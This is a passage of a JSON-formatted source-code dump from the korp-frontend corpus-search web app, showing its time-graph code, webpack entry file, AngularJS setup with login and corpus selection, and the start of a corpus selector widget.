currentLang : null,\n })\n },\n // TODO: this does nothing?\n selected: settings.defaultLanguage,\n })\n\n setTimeout(() => window.onHashChange(null, true), 0)\n $(\"body\").animate({ opacity: 1 }, function () {\n $(this).css(\"opacity\", \"\")\n })\n },\n function () {\n c.log(\"failed to load some resource at startup.\", arguments)\n return $(\"body\")\n .css({\n opacity: 1,\n padding: 20,\n })\n .html('<object class=\"korp_fail\" type=\"image/svg+xml\" data=\"img/korp_fail.svg\">')\n .append(\"<p>The server failed to respond, please try again later.</p>\")\n }\n)\n\nwindow.getAllCorporaInFolders = function (lastLevel, folderOrCorpus) {\n let outCorpora = []\n\n // Go down the alley to the last subfolder\n while (folderOrCorpus.includes(\".\")) {\n const posOfPeriod = _.indexOf(folderOrCorpus, \".\")\n const leftPart = folderOrCorpus.substr(0, posOfPeriod)\n const rightPart = folderOrCorpus.substr(posOfPeriod + 1)\n if (lastLevel[leftPart]) {\n lastLevel = lastLevel[leftPart]\n folderOrCorpus = rightPart\n } else {\n break\n }\n }\n if (lastLevel[folderOrCorpus]) {\n // Folder\n // Continue to go through any subfolders\n $.each(lastLevel[folderOrCorpus], function (key, val) {\n if (![\"title\", \"contents\", \"description\"].includes(key)) {\n outCorpora = outCorpora.concat(\n getAllCorporaInFolders(lastLevel[folderOrCorpus], key)\n )\n }\n })\n\n // And add the corpora in this folder level\n outCorpora = outCorpora.concat(lastLevel[folderOrCorpus][\"contents\"])\n } else {\n // Corpus\n outCorpora.push(folderOrCorpus)\n }\n return outCorpora\n}\n\nwindow.initTimeGraph = function (def) {\n let timestruct = null\n let restdata = null\n let restyear = null\n let hasRest = false\n\n let onTimeGraphChange\n\n const getValByDate = function (date, struct) {\n let output = null\n $.each(struct, function (i, item) {\n if (date === item[0]) {\n output = item[1]\n return false\n }\n })\n\n return output\n }\n\n window.timeDeferred = timeProxy\n .makeRequest()\n .fail((error) => {\n console.error(error)\n $(\"#time_graph\").html(\"<i>Could not draw graph due to a backend error.</i>\")\n })\n .done(function (...args) {\n let [dataByCorpus, all_timestruct, rest] = args[0]\n\n if (all_timestruct.length == 0) {\n return\n }\n\n for (let corpus in dataByCorpus) {\n let struct = dataByCorpus[corpus]\n if (corpus !== \"time\") {\n const cor = settings.corpora[corpus.toLowerCase()]\n timeProxy.expandTimeStruct(struct)\n cor.non_time = struct[\"\"]\n struct = _.omit(struct, \"\")\n cor.time = struct\n if (_.keys(struct).length > 1) {\n if (cor.common_attributes == null) {\n cor.common_attributes = {}\n }\n cor.common_attributes.date_interval = true\n }\n }\n }\n\n safeApply($(\"body\").scope(), function (scope) {\n scope.$broadcast(\n \"corpuschooserchange\",\n corpusChooserInstance.corpusChooser(\"selectedItems\")\n )\n return def.resolve()\n })\n\n onTimeGraphChange = function (evt, data) {\n let max = _.reduce(\n all_timestruct,\n function (accu, item) {\n if (item[1] > accu) {\n return item[1]\n }\n return accu\n },\n 0\n )\n\n // the 46 here is the presumed value of\n // the height of the graph\n const one_px = max / 46\n\n const normalize = (array) =>\n _.map(array, function (item) {\n const out = [].concat(item)\n if (out[1] < one_px && out[1] > 0) {\n out[1] = one_px\n }\n return out\n })\n\n const output = _(settings.corpusListing.selected)\n .map(\"time\")\n .filter(Boolean)\n .map(_.toPairs)\n .flatten(true)\n .reduce(function (memo, ...rest1) {\n const [a, b] = rest1[0]\n if (typeof memo[a] === 
\"undefined\") {\n memo[a] = b\n } else {\n memo[a] += b\n }\n return memo\n }, {})\n\n timestruct = timeProxy.compilePlotArray(output)\n const endyear = all_timestruct.slice(-1)[0][0]\n const yeardiff = endyear - all_timestruct[0][0]\n restyear = endyear + yeardiff / 25\n restdata = _(settings.corpusListing.selected)\n .filter((item) => item.time)\n .reduce((accu, corp) => accu + parseInt(corp.non_time || \"0\"), 0)\n\n hasRest = yeardiff > 0\n\n const plots = [\n { data: normalize([].concat(all_timestruct, [[restyear, rest]])) },\n { data: normalize(timestruct) },\n ]\n if (restdata) {\n plots.push({\n data: normalize([[restyear, restdata]]),\n })\n }\n\n $.plot($(\"#time_graph\"), plots, {\n bars: {\n show: true,\n fill: 1,\n align: \"center\",\n },\n\n grid: {\n hoverable: true,\n borderColor: \"white\",\n },\n\n yaxis: {\n show: false,\n },\n\n xaxis: {\n show: true,\n tickDecimals: 0,\n },\n\n hoverable: true,\n colors: [\"lightgrey\", \"navy\", \"#cd5c5c\"],\n })\n return $.each($(\"#time_graph .tickLabel\"), function () {\n if (parseInt($(this).text()) > new Date().getFullYear()) {\n return $(this).hide()\n }\n })\n }\n\n return $(\"#time_graph,#rest_time_graph\").bind(\n \"plothover\",\n _.throttle(function (event, pos, item) {\n if (item) {\n let total, val\n const date = item.datapoint[0]\n const header = $(\"<h4>\")\n if (date === restyear && hasRest) {\n header.text(util.getLocaleString(\"corpselector_rest_time\"))\n val = restdata\n total = rest\n } else {\n header.text(\n util.getLocaleString(\"corpselector_time\") + \" \" + item.datapoint[0]\n )\n val = getValByDate(date, timestruct)\n total = getValByDate(date, all_timestruct)\n }\n\n const pTmpl = _.template(\n \"<p><span rel='localize[<%= loc %>]'></span>: <%= num %> <span rel='localize[corpselector_tokens]' </p>\"\n )\n const firstrow = pTmpl({\n loc: \"corpselector_time_chosen\",\n num: util.prettyNumbers(val || 0),\n })\n const secondrow = pTmpl({\n loc: \"corpselector_of_total\",\n num: util.prettyNumbers(total),\n })\n $(\".corpusInfoSpace\").css({\n top: $(this).parent().offset().top,\n })\n return $(\".corpusInfoSpace\")\n .find(\"p\")\n .empty()\n .append(header, \"<span> </span>\", firstrow, secondrow)\n .localize()\n .end()\n .fadeIn(\"fast\")\n } else {\n return $(\".corpusInfoSpace\").fadeOut(\"fast\")\n }\n }, 100)\n )\n })\n\n const opendfd = $.Deferred()\n $(\"#corpusbox\").one(\"corpuschooseropen\", () => opendfd.resolve())\n\n return $.when(window.timeDeferred, opendfd).then(function () {\n if (onTimeGraphChange) {\n $(\"#corpusbox\").bind(\"corpuschooserchange\", onTimeGraphChange)\n return onTimeGraphChange()\n }\n })\n}\n"
},
{
"alpha_fraction": 0.7272065877914429,
"alphanum_fraction": 0.7284190058708191,
"avg_line_length": 30.968992233276367,
"blob_id": "8d77af8b99be8609dbcde7f77914866eb72633ad",
"content_id": "2e42beaf6964b60b515fbdd3f1ef3145973c1544",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4124,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 129,
"path": "/app/index.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "const $ = require(`jquery`);\nwindow.jQuery = $;\nwindow.$ = $;\n\nrequire(`slickgrid/slick.grid.css`);\nrequire(`./lib/jquery.reject.css`);\nrequire(`./styles/ui_mods.css`);\nrequire(`./styles/jquery.tooltip.css`);\nrequire(`rickshaw/rickshaw.css`);\n\nrequire(`leaflet/dist/leaflet.css`);\nrequire(`leaflet.markercluster/dist/MarkerCluster.css`);\nrequire(`geokorp/dist/styles/geokorp.css`);\nrequire(`components-jqueryui/themes/smoothness/jquery-ui.min.css`);\nrequire(`./styles/_bootstrap-custom.scss`);\n\nrequire(`./styles/tailwind.scss`);\n\nrequire(`./styles/styles.scss`);\nrequire(`./styles/textreader.css`);\n\nwindow._ = require(`lodash`);\n\nrequire(`components-jqueryui/ui/widget.js`);\nrequire(`components-jqueryui/ui/widgets/sortable.js`);\nrequire(`components-jqueryui/ui/widgets/dialog.js`);\n\nrequire(`angular`);\nrequire(`angular-ui-bootstrap/src/typeahead`);\nrequire(`angular-ui-bootstrap/src/tooltip`);\nrequire(`angular-ui-bootstrap/src/modal`);\nrequire(`angular-ui-bootstrap/src/tabs`);\nrequire(`angular-ui-bootstrap/src/dropdown`);\nrequire(`angular-ui-bootstrap/src/pagination`);\nrequire(`angular-ui-bootstrap/src/datepicker`);\nrequire(`angular-ui-bootstrap/src/timepicker`);\nrequire(`angular-ui-bootstrap/src/buttons`);\nrequire(`angular-ui-bootstrap/src/popover`);\n\nrequire(`angular-spinner`);\nrequire(`angular-ui-sortable/src/sortable`);\n\nrequire(`jreject`);\nrequire(`jquerylocalize`);\nrequire(`jqueryhoverintent`);\nrequire(`./lib/jquery.format.js`);\n\nconst deparam = require(`jquery-deparam`);\n\nwindow.c = console;\nwindow.isLab = window.location.pathname.split(`/`)[1] == `korplabb`;\nwindow.currentMode = deparam(window.location.search.slice(1)).mode || `default`;\n\n// tmhDynamicLocale = require(\"angular-dynamic-locale/src/tmhDynamicLocale\")\nrequire(`angular-dynamic-locale/dist/tmhDynamicLocale.js`);\nwindow.Raphael = require(`raphael`);\n\nrequire(`jquery-flot/jquery.flot.js`);\nrequire(`jquery-flot/jquery.flot.stack.js`);\n\nrequire(`slickgrid/lib/jquery.event.drag-2.3.0`);\nrequire(`slickgrid/slick.core`);\nrequire(`slickgrid/slick.grid`);\nrequire(`slickgrid/plugins/slick.checkboxselectcolumn`);\nrequire(`slickgrid/plugins/slick.rowselectionmodel`);\n\nrequire(`./scripts/jq_extensions.js`);\n\nwindow.moment = require(`moment`);\nwindow.CSV = require(`comma-separated-values/csv`);\n\nrequire(`./lib/leaflet-settings.js`);\n// require(\"leaflet\")\n// require(\"leaflet.markercluster\")\n// require(\"leaflet-providers\")\nrequire(`geokorp/dist/scripts/geokorp`);\nrequire(`geokorp/dist/scripts/geokorp-templates`);\nrequire(`angular-filter/index.js`);\n\n\nrequire(`./lib/jquery.tooltip.pack.js`);\n\nwindow.settings = {};\nsettings.markup = {\n msd: require(`./markup/msd.html`),\n};\nrequire(`configjs`);\nconst commonSettings = require(`commonjs`);\n// we need to put the exports on window so that the non-webpacked modes modes files\n// can use the exports\n_.map(commonSettings, function(v, k) {\n if (k in window) {\n console.error(`warning, overwriting setting` + k);\n }\n window[k] = 
v;\n});\n\nrequire(`./scripts/components/sidebar.js`);\n\nrequire(`./scripts/statistics.js`);\nrequire(`./scripts/cqp_parser/CQPParser.js`);\nrequire(`./scripts/cqp_parser/cqp.js`);\nrequire(`./scripts/util.js`);\nrequire(`./scripts/pie-widget.js`);\nrequire(`./scripts/search.js`);\nrequire(`./scripts/results.js`);\nrequire(`./scripts/model.js`);\nrequire(`./scripts/widgets.js`);\nrequire(`./scripts/main.js`);\nrequire(`./scripts/selector_widget.js`);\nrequire(`./scripts/app.js`);\nrequire(`./scripts/search_controllers.js`);\nrequire(`./scripts/kwic_download.js`);\nrequire(`./scripts/result_controllers.js`);\nrequire(`./scripts/map_controllers.js`);\nrequire(`./scripts/text_reader_controller.js`);\nrequire(`./scripts/video_controllers.js`);\nrequire(`./scripts/services.js`);\nrequire(`./scripts/extended.js`);\nrequire(`./scripts/struct_services.js`);\nrequire(`./scripts/directives.js`);\nrequire(`./scripts/filter_directives.js`);\nrequire(`./scripts/newsdesk.js`);\n\nfunction requireAll(r) { r.keys().forEach(r); }\nrequireAll(require.context(`customcss`, true, /\\.css$/));\nrequireAll(require.context(`customscripts`, true, /\\.js$/));\n\nrequire(`./index.pug`);\n"
},
{
"alpha_fraction": 0.5468671917915344,
"alphanum_fraction": 0.5472826957702637,
"avg_line_length": 30.09560775756836,
"blob_id": "7f01708dde96c958bd39ecc81788bff59c604200",
"content_id": "77c0212c8436e7f25bc9f61556c893366d9f8482",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12034,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 387,
"path": "/app/scripts/app.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\n\nimport jStorage from \"../lib/jstorage\"\nimport { kwicPagerName, kwicPager } from \"./components/pager\"\nimport { sidebarName, sidebarComponent } from \"./components/sidebar\"\nimport { setDefaultConfigValues } from \"./settings.js\"\n\nsetDefaultConfigValues()\n\nwindow.korpApp = angular.module(\"korpApp\", [\n \"ui.bootstrap.typeahead\",\n \"uib/template/typeahead/typeahead-popup.html\",\n \"uib/template/typeahead/typeahead-match.html\",\n \"ui.bootstrap.tooltip\",\n \"uib/template/tooltip/tooltip-popup.html\",\n \"uib/template/tooltip/tooltip-html-popup.html\",\n \"ui.bootstrap.modal\",\n \"uib/template/modal/window.html\",\n \"ui.bootstrap.tabs\",\n \"uib/template/tabs/tabset.html\",\n \"uib/template/tabs/tab.html\",\n \"ui.bootstrap.dropdown\",\n \"ui.bootstrap.pagination\",\n \"uib/template/pagination/pagination.html\",\n \"ui.bootstrap.datepicker\",\n \"uib/template/datepicker/datepicker.html\",\n \"uib/template/datepicker/day.html\",\n \"uib/template/datepicker/month.html\",\n \"uib/template/datepicker/year.html\",\n \"ui.bootstrap.timepicker\",\n \"uib/template/timepicker/timepicker.html\",\n \"ui.bootstrap.buttons\",\n \"ui.bootstrap.popover\",\n \"uib/template/popover/popover.html\",\n \"uib/template/popover/popover-template.html\",\n \"angularSpinner\",\n \"ui.sortable\",\n \"newsdesk\",\n \"sbMap\",\n \"tmh.dynamicLocale\",\n \"angular.filter\",\n])\n\nkorpApp.component(kwicPagerName, kwicPager).component(sidebarName, sidebarComponent)\n\nkorpApp.config((tmhDynamicLocaleProvider) =>\n tmhDynamicLocaleProvider.localeLocationPattern(\"translations/angular-locale_{{locale}}.js\")\n)\n\nkorpApp.config(($uibTooltipProvider) =>\n $uibTooltipProvider.options({\n appendToBody: true,\n })\n)\n\nkorpApp.config([\"$locationProvider\", ($locationProvider) => $locationProvider.hashPrefix(\"\")])\n\nkorpApp.config([\n \"$compileProvider\",\n ($compileProvider) =>\n $compileProvider.aHrefSanitizationWhitelist(/^\\s*(https?|ftp|mailto|tel|file|blob):/),\n])\n\nkorpApp.run(function ($rootScope, $location, searches, tmhDynamicLocale, $q, $timeout) {\n const s = $rootScope\n s._settings = settings\n window.lang = s.lang = $location.search().lang || settings.defaultLanguage\n s.word_selected = null\n s.isLab = window.isLab\n\n // s.sidebar_visible = false\n\n s.extendedCQP = null\n\n s.globalFilterDef = $q.defer()\n\n s.locationSearch = function () {\n const search = $location.search(...arguments)\n $location.replace()\n return search\n }\n\n s.searchtabs = () => $(\".search_tabs > ul\").scope().tabset.tabs\n\n tmhDynamicLocale.set(\"en\")\n\n s._loc = $location\n\n s.$watch(\"_loc.search()\", function () {\n _.defer(() => (window.onHashChange || _.noop)())\n\n return tmhDynamicLocale.set($location.search().lang || \"sv\")\n })\n\n $rootScope.kwicTabs = []\n $rootScope.compareTabs = []\n $rootScope.graphTabs = []\n $rootScope.mapTabs = []\n $rootScope.textTabs = []\n\n if ($location.search().corpus) {\n const initialCorpora = []\n\n function findInFolder(folder) {\n // checks if folder is an actual folder of corpora and recursively\n // collects all corpora in this folder and subfolders\n const corpusIds = []\n if (folder && folder.contents) {\n for (let corpusId of folder.contents) {\n corpusIds.push(corpusId)\n }\n for (let subFolderId of Object.keys(folder)) {\n for (let corpusId of findInFolder(folder[subFolderId])) {\n corpusIds.push(corpusId)\n }\n }\n }\n return corpusIds\n }\n\n for (let corpus of $location.search().corpus.split(\",\")) {\n const corpusObj = 
settings.corpusListing.struct[corpus]\n if (corpusObj) {\n initialCorpora.push(corpusObj)\n } else {\n // corpus does not correspond to a corpus ID, check if it is a folder\n for (let folderCorpus of findInFolder(settings.corporafolders[corpus])) {\n if (settings.corpusListing.struct[folderCorpus]) {\n initialCorpora.push(settings.corpusListing.struct[folderCorpus])\n }\n }\n }\n }\n\n const loginNeededFor = []\n for (let corpusObj of initialCorpora) {\n if (corpusObj.limitedAccess) {\n if (\n _.isEmpty(authenticationProxy.loginObj) ||\n !authenticationProxy.loginObj.credentials.includes(corpusObj.id.toUpperCase())\n ) {\n loginNeededFor.push(corpusObj)\n }\n }\n }\n s.loginNeededFor = loginNeededFor\n\n if (!_.isEmpty(s.loginNeededFor)) {\n s.savedState = $location.search()\n $location.url($location.path())\n\n // some state need special treatment\n if (s.savedState.reading_mode) {\n $location.search(\"reading_mode\")\n }\n if (s.savedState.search_tab) {\n $location.search(\"search_tab\", s.savedState.search_tab)\n }\n if (s.savedState.cqp) {\n $location.search(\"cqp\", s.savedState.cqp)\n }\n\n $location.search(\"display\", \"login\")\n }\n }\n\n s.restorePreLoginState = function () {\n if (s.savedState) {\n for (let key in s.savedState) {\n const val = s.savedState[key]\n if (key !== \"search_tab\") {\n $location.search(key, val)\n }\n }\n\n // some state need special treatment\n s.$broadcast(\"updateAdvancedCQP\")\n\n const corpora = s.savedState.corpus.split(\",\")\n settings.corpusListing.select(corpora)\n corpusChooserInstance.corpusChooser(\"selectItems\", corpora)\n\n s.savedState = null\n s.loginNeededFor = null\n }\n }\n\n s.searchDisabled = false\n s.$on(\"corpuschooserchange\", function (event, corpora) {\n settings.corpusListing.select(corpora)\n const nonprotected = _.map(settings.corpusListing.getNonProtected(), \"id\")\n if (\n corpora.length &&\n _.intersection(corpora, nonprotected).length !== nonprotected.length\n ) {\n $location.search(\"corpus\", corpora.join(\",\"))\n } else {\n $location.search(\"corpus\", null)\n }\n s.searchDisabled = settings.corpusListing.selected.length === 0\n })\n\n searches.infoDef.then(function () {\n let { corpus } = $location.search()\n let currentCorpora = []\n if (corpus) {\n currentCorpora = _.flatten(\n _.map(corpus.split(\",\"), (val) =>\n getAllCorporaInFolders(settings.corporafolders, val)\n )\n )\n } else {\n if (!(settings.preselectedCorpora && settings.preselectedCorpora.length)) {\n currentCorpora = _.map(settings.corpusListing.corpora, \"id\")\n } else {\n for (let pre_item of settings.preselectedCorpora) {\n pre_item = pre_item.replace(/^__/g, \"\")\n currentCorpora = [].concat(\n currentCorpora,\n getAllCorporaInFolders(settings.corporafolders, pre_item)\n )\n }\n }\n\n settings.preselectedCorpora = currentCorpora\n }\n\n settings.corpusListing.select(currentCorpora)\n corpusChooserInstance.corpusChooser(\"selectItems\", currentCorpora)\n })\n})\n\nkorpApp.controller(\"headerCtrl\", function ($scope, $uibModal, utils) {\n const s = $scope\n\n s.logoClick = function () {\n const [baseUrl, modeParam, langParam] = $scope.getUrlParts(currentMode)\n window.location = baseUrl + modeParam + langParam\n if (langParam.length > 0) {\n window.location.reload()\n }\n }\n\n s.citeClick = () => {\n s.show_modal = \"about\"\n }\n\n s.showLogin = () => {\n s.show_modal = \"login\"\n }\n\n s.logout = function () {\n authenticationProxy.loginObj = {}\n jStorage.deleteKey(\"creds\")\n\n // TODO figure out another way to do this\n for (let 
corpusObj of settings.corpusListing.corpora) {\n const corpus = corpusObj.id\n if (corpusObj.limitedAccess) {\n $(`#hpcorpus_${corpus}`).closest(\".boxdiv\").addClass(\"disabled\")\n }\n }\n $(\"#corpusbox\").corpusChooser(\"updateAllStates\")\n\n let newCorpora = []\n for (let corpus of settings.corpusListing.getSelectedCorpora()) {\n if (!settings.corpora[corpus].limitedAccess) {\n newCorpora.push(corpus)\n }\n }\n\n if (_.isEmpty(newCorpora)) {\n newCorpora = settings.preselectedCorpora\n }\n settings.corpusListing.select(newCorpora)\n s.loggedIn = false\n $(\"#corpusbox\").corpusChooser(\"selectItems\", newCorpora)\n }\n\n const N_VISIBLE = settings.visibleModes\n\n s.modes = _.filter(settings.modeConfig)\n if (!isLab) {\n s.modes = _.filter(settings.modeConfig, (item) => item.labOnly !== true)\n }\n\n s.visible = s.modes.slice(0, N_VISIBLE)\n s.menu = s.modes.slice(N_VISIBLE)\n\n const i = _.map(s.menu, \"mode\").indexOf(currentMode)\n if (i !== -1) {\n s.visible.push(s.menu[i])\n s.menu.splice(i, 1)\n }\n\n for (let mode of s.modes) {\n mode.selected = false\n if (mode.mode === currentMode) {\n mode.selected = true\n }\n }\n\n s.getUrl = function (modeId) {\n return s.getUrlParts(modeId).join(\"\")\n }\n\n s.getUrlParts = function (modeId) {\n const langParam = settings.defaultLanguage === s.$root.lang ? \"\" : `#?lang=${s.$root.lang}`\n const modeParam = modeId === \"default\" ? \"\" : `?mode=${modeId}`\n return [location.pathname, modeParam, langParam]\n }\n\n s.show_modal = false\n\n let modal = null\n utils.setupHash(s, [\n {\n key: \"display\",\n scope_name: \"show_modal\",\n post_change(val) {\n if (val) {\n showModal(val)\n } else {\n if (modal != null) {\n modal.close()\n }\n modal = null\n }\n },\n },\n ])\n\n const closeModals = function () {\n s.login_err = false\n s.show_modal = false\n }\n\n var showModal = function (key) {\n const tmpl = { about: require(\"../markup/about.html\"), login: \"login_modal\" }[key]\n const params = {\n templateUrl: tmpl,\n scope: s,\n windowClass: key,\n }\n if (key === \"login\") {\n params.size = \"sm\"\n }\n modal = $uibModal.open(params)\n\n modal.result.then(\n () => closeModals(),\n () => closeModals()\n )\n }\n\n s.clickX = () => closeModals()\n\n s.loggedIn = false\n const creds = jStorage.get(\"creds\")\n if (creds) {\n util.setLogin()\n s.loggedIn = true\n s.username = authenticationProxy.loginObj.name\n }\n s.loginSubmit = function (usr, pass, saveLogin) {\n s.login_err = false\n authenticationProxy\n .makeRequest(usr, pass, saveLogin)\n .done(function () {\n util.setLogin()\n safeApply(s, function () {\n s.show_modal = null\n s.restorePreLoginState()\n s.loggedIn = true\n s.username = usr\n })\n })\n .fail(function () {\n c.log(\"login fail\")\n safeApply(s, () => {\n s.login_err = true\n })\n })\n }\n})\n\nkorpApp.filter(\"trust\", ($sce) => (input) => $sce.trustAsHtml(input))\n"
},
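The entry above ends with `headerCtrl`, whose `getUrlParts` assembles the mode-switcher links from three independent pieces — path, mode query, and language hash — each omitted when it matches the default. A minimal standalone sketch of that composition, with `settings` reduced to a stub:

```js
// Sketch of headerCtrl.getUrlParts: parameters are dropped when they
// match the defaults, so default-mode/default-language URLs stay clean.
const settings = { defaultLanguage: "en" }; // stub for the app settings

function getUrlParts(pathname, modeId, lang) {
  const modeParam = modeId === "default" ? "" : `?mode=${modeId}`;
  const langParam = lang === settings.defaultLanguage ? "" : `#?lang=${lang}`;
  return [pathname, modeParam, langParam];
}

console.log(getUrlParts("/korp/", "parallel", "sv").join(""));
// -> "/korp/?mode=parallel#?lang=sv"
```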
{
"alpha_fraction": 0.4358167350292206,
"alphanum_fraction": 0.43878424167633057,
"avg_line_length": 39.88418960571289,
"blob_id": "142572e2cba8684fda1cca55226f8c0417e24b26",
"content_id": "d353dab104045f92d0a9457b3f7d690adc9e1ddb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 22244,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 544,
"path": "/app/scripts/selector_widget.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\n\nvar collapsedImg = require(\"../img/collapsed.png\")\nvar hp_this\nvar hp_corpusChooser = {\n options: {\n template: \"\",\n },\n\n _create: function () {\n this.totalTokenCount = 0\n this._transform()\n var self = this\n\n this.updateAllStates()\n\n // Make the popup disappear when the user clicks outside it\n $(window).unbind(\"click.corpusselector\")\n $(window).bind(\"click.corpusselector\", function (e) {\n if ($(\".popupchecks\").is(\":visible\") && e.target != self) {\n $(\".popupchecks\").fadeOut(\"fast\")\n $(\".corpusInfoSpace\").fadeOut(\"fast\")\n $(\".hp_topframe\").removeClass(\"ui-corner-top\")\n }\n })\n\n $(\".buttonlink, ul#icons li\").hover(\n function () {\n $(this).addClass(\"ui-state-hover\")\n },\n function () {\n $(this).removeClass(\"ui-state-hover\")\n }\n )\n },\n isSelected: function (id) {\n // Test if a given id is selected\n var cb = $(\"#\" + id)\n return cb.hasClass(\"checked\")\n },\n selectedItems: function () {\n // Return all ids that are selected\n var IDArray = []\n var allboxes = $(\".boxdiv label .checked\")\n allboxes.each(function () {\n var idstring = $(this).attr(\"id\")\n if (idstring != \"\") {\n IDArray.push(idstring.slice(9))\n }\n })\n return IDArray\n },\n selectItems: function (item_ids) {\n item_ids = $.map(item_ids, function (item) {\n return \"hpcorpus_\" + item\n })\n // Check items from outside\n var allboxes = $(\".checkbox\")\n allboxes.each(function () {\n /* First clear all items */\n hp_this.setStatus($(this), \"unchecked\")\n })\n var realboxes = $(\".boxdiv\")\n realboxes.each(function () {\n var chk = $(\".checkbox\", this)\n if ($.inArray(chk.attr(\"id\"), item_ids) != -1 && !$(this).is(\".disabled\")) {\n /* Change status of item */\n hp_this.setStatus(chk, \"checked\")\n hp_this.updateState(chk) // <-?\n var ancestors = chk.parents(\".tree\")\n ancestors.each(function () {\n hp_this.updateState($(this))\n })\n }\n })\n this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n },\n updateAllStates: function () {\n var self = this\n $(\".tree\").each(function () {\n self.updateState($(this))\n })\n },\n updateState: function (element) {\n // element is a div!\n var descendants = element.find(\".checkbox\")\n var numbOfChecked = 0\n var numbOfUnchecked = 0\n descendants.each(function () {\n if (!$(this).parent().parent().hasClass(\"tree\")) {\n if ($(this).hasClass(\"checked\")) {\n numbOfChecked++\n } else if ($(this).hasClass(\"unchecked\")) {\n numbOfUnchecked++\n }\n }\n })\n var theBox = element.children(\"label\").children(\".checkbox\")\n if (numbOfUnchecked > 0 && numbOfChecked > 0) {\n this.setStatus(theBox, \"intermediate\") // Intermediate\n } else if (numbOfUnchecked > 0 && numbOfChecked == 0) {\n this.setStatus(theBox, \"unchecked\") // Unchecked\n } else if (numbOfChecked > 0 && numbOfUnchecked == 0) {\n this.setStatus(theBox, \"checked\") // Checked\n }\n\n var numDisabled = element.find(\".disabled\").length\n if (element.find(\".boxdiv\").length === numDisabled && numDisabled > 0) {\n element.addClass(\"disabled\")\n } else {\n element.removeClass(\"disabled\")\n }\n },\n setStatus: function (obj, stat) {\n /* Change status of item */\n obj.removeClass(\"intermediate unchecked checked\")\n if (stat == \"checked\") {\n obj.addClass(\"checked\")\n } else if (stat == \"intermediate\") {\n obj.addClass(\"intermediate\")\n } else {\n obj.addClass(\"unchecked\")\n }\n },\n countSelected: function () {\n /* Update header */\n var header_text = \"\"\n var header_text_2 
= \"\"\n var header_total = \"\"\n var header_of = false\n var checked_checkboxes = $(\".hplabel .checked\")\n var num_checked_checkboxes = checked_checkboxes.length\n var num_unchecked_checkboxes = $(\".hplabel .unchecked\").length\n var num_checkboxes = $(\".hplabel .checkbox\").length\n // if (num_unchecked_checkboxes == num_checkboxes) {\n // header_text_2 = 'corpselector_noneselected';\n // } else\n if (num_checked_checkboxes == num_checkboxes && num_checkboxes > 1) {\n header_text = num_checked_checkboxes\n header_text_2 = \"corpselector_allselected\"\n } else if (num_checked_checkboxes == 1) {\n var currentCorpusName = checked_checkboxes.parent().parent().attr(\"data\")\n if (currentCorpusName.length > 37) {\n // Ellipsis\n currentCorpusName = _.trim(currentCorpusName.substr(0, 37)) + \"...\"\n }\n header_text = currentCorpusName\n header_text_2 = \"corpselector_selectedone\"\n } else {\n header_text = num_checked_checkboxes\n header_text_2 = \"corpselector_selectedmultiple\"\n header_total = $(\".popupchecks\").find(\".hplabel\").length\n header_of = true\n }\n\n // Number of tokens\n var selectedNumberOfTokens = 0\n var selectedNumberOfSentences = 0\n checked_checkboxes.each(function (key, corpItem) {\n var corpusID = $(this).attr(\"id\").slice(9)\n selectedNumberOfTokens += parseInt(settings.corpora[corpusID][\"info\"][\"Size\"])\n var numSen = parseInt(settings.corpora[corpusID][\"info\"][\"Sentences\"])\n if (!isNaN(numSen)) selectedNumberOfSentences += numSen\n })\n var totalNumberOfTokens = this.totalTokenCount\n\n $(\"#hp_corpora_title1\").text(header_text)\n $(\"#hp_corpora_titleOf\").toggle(header_of)\n $(\"#hp_corpora_titleTotal\").text(header_total)\n $(\"#hp_corpora_title2\").attr({ rel: \"localize[\" + header_text_2 + \"]\" })\n $(\"#hp_corpora_title2\").text(util.getLocaleString(header_text_2))\n $(\"#hp_corpora_titleTokens\")\n .html(\n \" — \" +\n util.suffixedNumbers(selectedNumberOfTokens.toString()) +\n '<span rel=\"localize[corpselector_of]\">' +\n util.getLocaleString(\"corpselector_of\") +\n \"</span>\" +\n util.suffixedNumbers(totalNumberOfTokens.toString()) +\n \" \"\n )\n .append($(\"<span>\").localeKey(\"corpselector_tokens\"))\n $(\"#sentenceCounter\")\n .html(util.prettyNumbers(selectedNumberOfSentences.toString()) + \" \")\n .append($(\"<span>\").localeKey(\"corpselector_sentences_long\"))\n },\n triggerChange: function () {\n this._trigger(\"change\", null, [this.selectedItems()])\n },\n\n redraw: function () {\n this._transform()\n },\n\n _transform: function () {\n var el = this.element\n hp_this = this\n var body\n if (this.options.template != \"\") {\n body = this.options.template\n } else {\n body = el.html()\n }\n\n var newHTML = recursive_transform(body, 0)\n $(\".popupchecks .checks\").html(newHTML)\n\n // el.addClass(\"scroll_checkboxes inline_block\");\n var pos = $(\".scroll_checkboxes\").offset().left + 434\n $(\".corpusInfoSpace\")\n .css({ left: pos.toString() + \"px\" })\n .click(function (event) {\n var target = event.target\n if (!$(target).is(\"a\")) return false\n })\n\n hp_this.countSelected()\n // Update the number of children for all folders:\n $(\".tree\").each(function () {\n var noItems = $(this).find(\".hplabel .checkbox\").length\n $(this)\n .children(\"label\")\n .children(\".numberOfChildren\")\n .text(\"(\" + noItems + \")\")\n })\n\n var popoffset = $(\".scroll_checkboxes\").position().top + $(\".scroll_checkboxes\").height()\n\n $(\".scroll_checkboxes\").unbind(\"mousedown\")\n 
